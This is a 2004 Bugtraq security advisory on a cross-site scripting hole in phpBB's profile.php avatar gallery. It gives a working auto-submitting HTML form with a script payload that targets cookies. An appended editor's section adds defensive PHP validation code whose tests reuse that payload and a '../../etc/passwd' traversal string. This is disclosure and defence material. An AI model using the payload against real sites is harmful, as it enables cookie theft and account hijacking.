[34198] in bugtraq


phpBB profile.php Cross Site Scripting Vulnerability

daemon@ATHENA.MIT.EDU (Cheng Peng Su)
Mon Mar 22 13:27:06 2004

Date: 21 Mar 2004 03:36:19 -0000
Message-ID: <20040321033619.22792.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Cheng Peng Su <apple_soup@msn.com>
To: bugtraq@securityfocus.com

#####################################################################

 Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
  Release Date : Mar 21, 2004
   Application : phpBB
       Version : phpBB 2.0.6d or others?
      Platform : PHP
    Vendor URL : http://www.phpbb.com/
        Author : Cheng Peng Su (apple_soup_at_msn.com)

#####################################################################

 Proof of Concept:

     This vuln is in profile.php. When you click [Show Gallery], phpBB
  will show you the Avatar gallery, asking you to choose one for yourself.
  The hole is in the form: after submitting, phpBB will use the value of
  "avatarselect" as the path of the gallery directly, without filtering
  any illegal characters.
   
 Exploit:
  
  -------------exploit.htm--------------
  <form name='f' action="http://site/profile.php?mode=editprofile" method="post">
  <input name="avatarselect" value='" ><script>alert(document.cookie)</script>'>
  <input type="submit" name="submitavatar" value="Select avatar">
  </form>
  <script>
  window.onload=function()
   {
    document.all.submitavatar.click();
   }
  </script>
  ---------------end-------------------
  
 Contact:
 
  Cheng Peng Su
  Class 1, Senior 2, High School attached to Wuhan University
  Wuhan, Hubei, China (430072)
  apple_soup_at_msn.com
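Editor's added illustration (not code from the advisory above and not phpBB's own profile.php): the advisory's root cause is that the submitted "avatarselect" value is used as a gallery path and reflected into HTML without validation. The PHP below shows the two checks a defender would expect at that point: an allow-list that only accepts a value naming an existing image inside the gallery directory, and output escaping even for values that passed the allow-list. The gallery layout (category/file.ext), the function names and the constructed temporary gallery are assumptions made for this example.

```php
<?php
// Added illustration, not phpBB code: hardened handling of the
// "avatarselect" form value described in the advisory above.
// Assumed layout: gallery images live under $galleryRoot/<category>/<file>.

/**
 * Return the gallery-relative path for a submitted avatar choice,
 * or null if the value does not name an existing gallery image.
 */
function resolve_gallery_avatar(string $galleryRoot, string $submitted): ?string
{
    // 1. Syntactic allow-list: only "category/file.ext" with a safe charset.
    //    This rejects quotes, angle brackets, "..", absolute paths and NUL
    //    bytes before the value touches the file system or any HTML.
    if (!preg_match('#^[A-Za-z0-9_-]+/[A-Za-z0-9_-]+\.(gif|jpe?g|png)$#', $submitted)) {
        return null;
    }

    // 2. Semantic allow-list: the file must actually exist inside the gallery.
    //    realpath() canonicalises both sides and the prefix check confirms the
    //    resolved file did not escape $galleryRoot.
    $root = realpath($galleryRoot);
    $full = realpath($galleryRoot . '/' . $submitted);
    if ($root === false || $full === false) {
        return null;
    }
    if (strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $submitted;
}

/**
 * Render the avatar <img> tag. Even a validated value is escaped on output,
 * so the template never emits request data verbatim.
 */
function render_avatar_tag(string $galleryUrl, string $relativePath): string
{
    $src = $galleryUrl . '/' . $relativePath;
    return '<img src="' . htmlspecialchars($src, ENT_QUOTES, 'UTF-8') . '" alt="avatar" />';
}

// Demonstration on a constructed temporary gallery (sample data, not a real install).
$gallery = sys_get_temp_dir() . '/demo_gallery_' . getmypid();
mkdir($gallery . '/animals', 0700, true);
touch($gallery . '/animals/cat.gif');

$cases = [
    'animals/cat.gif',                              // legitimate choice: accepted
    'animals/dog.gif',                              // well-formed but no such file: rejected
    '" ><script>alert(document.cookie)</script>',   // the advisory's payload: rejected
    '../../etc/passwd',                             // path-shaped input: rejected by the same checks
];
foreach ($cases as $value) {
    $ok = resolve_gallery_avatar($gallery, $value);
    echo str_pad(var_export($value, true), 50) . ' => ';
    echo $ok === null ? "rejected\n" : render_avatar_tag('/images/avatars/gallery', $ok) . "\n";
}

// Remove the constructed gallery again.
unlink($gallery . '/animals/cat.gif');
rmdir($gallery . '/animals');
rmdir($gallery);
```

Run with `php example.php`; only the first case produces an `<img>` tag, and its `src` is HTML-escaped regardless of how it was validated. The allow-list is the fix for the reflected value the advisory describes; the output escaping is the defence-in-depth layer that keeps a future validation gap from becoming script injection again.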
